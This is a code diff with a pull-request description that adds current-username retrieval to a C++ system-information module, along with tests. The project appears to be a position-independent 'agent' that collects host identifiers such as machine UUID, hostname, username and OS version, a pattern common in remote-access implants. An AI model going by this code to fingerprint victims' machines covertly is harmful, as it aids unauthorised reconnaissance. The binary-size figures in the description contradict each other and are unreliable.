+			USIZE nameLen = (USIZE)(nameEnd - nameStart);
+			if (nameLen >= buffer.Size())
+				nameLen = buffer.Size() - 1;
+			Memory::Copy(buffer.Data(), nameStart, nameLen);
+			buffer.Data()[nameLen] = '\0';
+			return Result<USIZE, Error>::Ok(nameLen);
+		}
+
+		line = (eol < end) ? eol + 1 : eol;
+	}
+
+	return Result<USIZE, Error>::Err(Error(Error::None));
+}
+#endif
+
+Result<USIZE, Error> Environment::GetUsername(Span<CHAR> buffer) noexcept
+{
+	// Try USER / LOGNAME first (works on Linux/Android via /proc/self/environ).
+	USIZE len = Environment::GetVariable("USER", buffer);
+	if (len > 0)
+		return Result<USIZE, Error>::Ok(len);
+	len = Environment::GetVariable("LOGNAME", buffer);
+	if (len > 0)
+		return Result<USIZE, Error>::Ok(len);
+
+#if defined(PLATFORM_MACOS) || defined(PLATFORM_IOS) || defined(PLATFORM_FREEBSD) || defined(PLATFORM_SOLARIS)
+	// Environment layer is stubbed here: resolve via getuid() + /etc/passwd.
+	return ResolveUsernameFromPasswd(buffer);
+#else
+	return Result<USIZE, Error>::Err(Error(Error::None));
+#endif
+}
+
 Result<USIZE, Error> Environment::GetHostname(Span<CHAR> buffer) noexcept
 {
 	// Try HOSTNAME environment variable first (works on Linux/Android)

--- a/src/platform/system/posix/environment.cc
+++ b/src/platform/system/posix/environment.cc
@@ -449,6 +449,13 @@ Result<USIZE, Error> Environment::GetUsername(Span<CHAR> buffer) noexcept
 #if defined(PLATFORM_MACOS) || defined(PLATFORM_IOS) || defined(PLATFORM_FREEBSD) || defined(PLATFORM_SOLARIS)
 	// Environment layer is stubbed here: resolve via getuid() + /etc/passwd.
 	return ResolveUsernameFromPasswd(buffer);
+#elif defined(PLATFORM_ANDROID)
+	// Android has no USER/LOGNAME environment and no /etc/passwd; report the
+	// numeric uid (the app sandbox identity) via getuid().
+	{
+		UINT32 uid = (UINT32)System::Call(SYS_GETUID);
+		return Result<USIZE, Error>::Ok(StringUtils::UIntToStr(uid, buffer));
+	}
 #else
 	return Result<USIZE, Error>::Err(Error(Error::None));
 #endif

--- a/src/platform/system/system_info.cc
+++ b/src/platform/system/system_info.cc
@@ -18,6 +18,10 @@ VOID GetSystemInfo(SystemInfo *info)
 	if (!hostnameResult)
 		LOG_ERROR("Failed to retrieve hostname");
 
+	auto usernameResult = Environment::GetUsername(Span<CHAR>(info->Username, 255));
+	if (!usernameResult)
+		LOG_ERROR("Failed to retrieve username");
+
 	Environment::GetArchitecture(Span<CHAR>(info->Architecture, 31));
 	Environment::GetAgentPlatform(Span<CHAR>(info->AgentPlatform, 31));
 

--- a/src/platform/system/system_info.h
+++ b/src/platform/system/system_info.h
@@ -32,14 +32,15 @@
  * @brief System information structure
  *
  * @details Contains identifying information about the host system.
- * Hostname, Architecture, AgentPlatform, and OSVersion are null-terminated
- * narrow strings.
+ * Hostname, Username, Architecture, AgentPlatform, and OSVersion are
+ * null-terminated narrow strings.
  */
 #pragma pack(push, 1)
 struct SystemInfo
 {
     UUID MachineUUID;        ///< Machine-unique identifier (hardware/OS level)
     CHAR Hostname[256];      ///< Machine hostname / computer name
+    CHAR Username[256];      ///< Current user name (e.g. "root", "admin"); empty if unavailable
     CHAR Architecture[32];   ///< CPU architecture (e.g. "x86_64", "aarch64")
     CHAR AgentPlatform[32];  ///< Compile-time OS target (e.g. "windows", "linux")
     CHAR OSVersion[128];     ///< Runtime OS version (e.g. "Windows 10.0 Build 19045", "Linux 6.1.0")

--- a/src/platform/system/system_info.h
+++ b/src/platform/system/system_info.h
@@ -3,18 +3,21 @@
  * @brief System information retrieval
  *
  * @details Provides a cross-platform function to retrieve basic system
- * information including machine UUID, hostname, CPU architecture,
+ * information including machine UUID, hostname, username, CPU architecture,
  * compile-time OS target (AgentPlatform), and runtime OS version (OSVersion).
  *
  * Platform implementations:
- * - Windows: UUID from SMBIOS, hostname from COMPUTERNAME environment variable,
- *   runtime OS version from the PEB (OSMajorVersion/OSMinorVersion/OSBuildNumber)
- * - Linux/Android: UUID from /etc/machine-id, hostname from HOSTNAME environment
- *   variable or /etc/hostname, runtime OS version from the uname syscall
- * - macOS/FreeBSD/Solaris/iOS: UUID from /etc/machine-id, hostname from
- *   HOSTNAME or /etc/hostname, runtime OS version from /proc/version or
- *   platform-specific files (best effort)
- * - UEFI: UUID unavailable, hostname unavailable (returns defaults)
+ * - Windows: UUID from SMBIOS, hostname from COMPUTERNAME env var, username
+ *   from USERNAME env var, runtime OS version from the PEB
+ *   (OSMajorVersion/OSMinorVersion/OSBuildNumber)
+ * - Linux/Android: UUID from /etc/machine-id, hostname from HOSTNAME env var
+ *   or /etc/hostname, username from USER/LOGNAME env or getuid()+/etc/passwd
+ *   (uid read from /proc/self/status), runtime OS version from the uname syscall
+ * - macOS/iOS/FreeBSD/Solaris: UUID from /etc/machine-id or sysctl, hostname
+ *   from sysctl/utssys, username from getuid()+/etc/passwd (falls back to the
+ *   numeric uid where the user is not in /etc/passwd, e.g. macOS Directory
+ *   Service), runtime OS version from sysctl/utssys
+ * - UEFI: UUID unavailable, hostname/username unavailable (returns defaults)
  *
  * Architecture and AgentPlatform strings are determined at compile time from
  * the ARCHITECTURE_* and PLATFORM_* preprocessor defines. The OSVersion string
@@ -53,6 +56,7 @@ struct SystemInfo
  * @details Populates a SystemInfo structure with:
  * - MachineUUID: Hardware/OS-level unique identifier (platform-specific)
  * - Hostname: Retrieved from OS environment (platform-specific)
+ * - Username: Current user name (env, getuid()+/etc/passwd, or numeric uid)
  * - Architecture: Compile-time string from ARCHITECTURE_* define
  * - AgentPlatform: Compile-time string from PLATFORM_* define
  * - OSVersion: Runtime OS version string (e.g. "Windows 10.0 Build 19045")

--- a/src/platform/system/uefi/environment.cc
+++ b/src/platform/system/uefi/environment.cc
@@ -38,6 +38,14 @@ Result<USIZE, Error> Environment::GetHostname(Span<CHAR> buffer) noexcept
 	return Result<USIZE, Error>::Err(Error(Error::None));
 }
 
+Result<USIZE, Error> Environment::GetUsername(Span<CHAR> buffer) noexcept
+{
+	// UEFI has no OS user concept.
+	if (buffer.Size() > 0)
+		buffer[0] = '\0';
+	return Result<USIZE, Error>::Err(Error(Error::None));
+}
+
 USIZE Environment::GetArchitecture(Span<CHAR> buffer) noexcept
 {
 #if defined(ARCHITECTURE_X86_64)

--- a/src/platform/system/windows/environment.cc
+++ b/src/platform/system/windows/environment.cc
@@ -188,6 +188,15 @@ Result<USIZE, Error> Environment::GetHostname(Span<CHAR> buffer) noexcept
 	return Result<USIZE, Error>::Err(Error(Error::None));
 }
 
+Result<USIZE, Error> Environment::GetUsername(Span<CHAR> buffer) noexcept
+{
+	// USERNAME is populated in the PEB environment block at process creation.
+	USIZE len = Environment::GetVariable("USERNAME", buffer);
+	if (len > 0)
+		return Result<USIZE, Error>::Ok(len);
+	return Result<USIZE, Error>::Err(Error(Error::None));
+}
+
 USIZE Environment::GetArchitecture(Span<CHAR> buffer) noexcept
 {
 #if defined(ARCHITECTURE_X86_64)

--- a/src/platform/system/windows/environment.cc
+++ b/src/platform/system/windows/environment.cc
@@ -191,6 +191,9 @@ Result<USIZE, Error> Environment::GetHostname(Span<CHAR> buffer) noexcept
 Result<USIZE, Error> Environment::GetUsername(Span<CHAR> buffer) noexcept
 {
 	// USERNAME is populated in the PEB environment block at process creation.
+	if (buffer.Size() > 0)
+		buffer[0] = '\0';
+
 	USIZE len = Environment::GetVariable("USERNAME", buffer);
 	if (len > 0)
 		return Result<USIZE, Error>::Ok(len);

--- a/tests/environment_tests.h
+++ b/tests/environment_tests.h
@@ -20,6 +20,7 @@ public:
 		RunTest(allPassed, &TestGetAgentPlatformKnownValue, "GetAgentPlatform returns known platform");
 		RunTest(allPassed, &TestGetOSVersion, "GetOSVersion returns non-empty string");
 		RunTest(allPassed, &TestGetHostname, "GetHostname returns non-empty string");
+		RunTest(allPassed, &TestGetUsername, "GetUsername returns non-empty string");
 		RunTest(allPassed, &TestGetArchitecture, "GetArchitecture returns known architecture");
 		RunTest(allPassed, &TestGetMachineUUID, "GetMachineUUID returns valid UUID");
 		RunTest(allPassed, &TestSystemInfoPopulated, "SystemInfo fields are populated");
@@ -142,6 +143,29 @@ private:
 		return true;
 	}
 
+	static BOOL TestGetUsername()
+	{
+		CHAR buffer[256];
+		Memory::Zero(buffer, sizeof(buffer));
+
+		auto result = Environment::GetUsername(Span<CHAR>(buffer, 255));
+
+		if (!result)
+		{
+#if defined(PLATFORM_UEFI)
+			// UEFI has no user concept; all other platforms resolve via env or getuid()+/etc/passwd
+			LOG_INFO("  GetUsername not available on this platform (expected)");
+			return true;
+#else
+			LOG_ERROR("GetUsername failed");
+			return false;
+#endif
+		}
+
+		LOG_INFO("  Username: %s (len=%llu)", buffer, (UINT64)result.Value());
+		return true;
+	}
+
 	static BOOL TestGetMachineUUID()
 	{
 		auto result = GetMachineUUID();
@@ -226,6 +250,17 @@ private:
 #endif
 		}
 
+		// Username may not be available on UEFI
+		if (info.Username[0] == '\0')
+		{
+#if defined(PLATFORM_UEFI)
+			LOG_INFO("  SystemInfo.Username empty (expected on this platform)");
+#else
+			LOG_ERROR("SystemInfo.Username is empty");
+			return false;
+#endif
+		}
+
 		if (info.Architecture[0] == '\0')
 		{
 			LOG_ERROR("SystemInfo.Architecture is empty");
@@ -244,8 +279,8 @@ private:
 			return false;
 		}
 
-		LOG_INFO("  SystemInfo: host=%s, arch=%s, agent_platform=%s, os_version=%s",
-				 info.Hostname, info.Architecture, info.AgentPlatform, info.OSVersion);
+		LOG_INFO("  SystemInfo: host=%s, user=%s, arch=%s, agent_platform=%s, os_version=%s",
+				 info.Hostname, info.Username, info.Architecture, info.AgentPlatform, info.OSVersion);
 
 		return true;
 	}


### PR DESCRIPTION
## Summary

<!-- Brief description of the changes (1-3 sentences) -->
This pull request adds support for retrieving and reporting the current username across all supported platforms, and integrates this information into the system information structures and logging. It introduces a new `GetUsername` method in the `Environment` class, updates the `SystemInfo` struct and related logic, and expands the test suite to cover these changes.
Closes #75 .
## Type of Change

- [ ] Bug fix
- [x] New feature / command
- [ ] Refactoring (no functional changes)
- [ ] Documentation
- [ ] Build system / CI
- [ ] Other:

## Platforms Tested

<!-- List the platform-architecture presets you built and tested against -->

- [x] `windows-x86_64-release`
- [x] `linux-x86_64-release`
- [x] `macos-aarch64-release`
- [x] Other:

## Binary Size Impact

<!-- Required: Report .text section size before and after your change for at least one preset -->
<!-- Use: llvm-size build/release/<platform>/<arch>/output.exe -->

```
Preset: Windows-x86-64-release
Before: exe 103,936 bytes, bin 103,936 bytes
After:  exe  102,059 bytes, bin 102,229 bytes
Diff:   + 0 B, + 170 B
```

## Checklist

- [x] Build passes with no warnings for at least one preset
- [x] Post-build PIC verification passes (no `.rdata`/`.rodata`/`.data`/`.bss` sections)
- [x] Code follows [naming conventions](CONTRIBUTING.md#naming-conventions) and [code style](CONTRIBUTING.md#code-style)
- [x] Doxygen documentation added for new public APIs
- [x] No STL, no exceptions, no RTTI
- [x] `Result<T, Error>` used for all fallible functions
- [x] Binary size diff reported above
- [x] README updated (if adding/modifying commands)

## Additional Notes

<!-- Any context, design decisions, trade-offs, or related issues -->
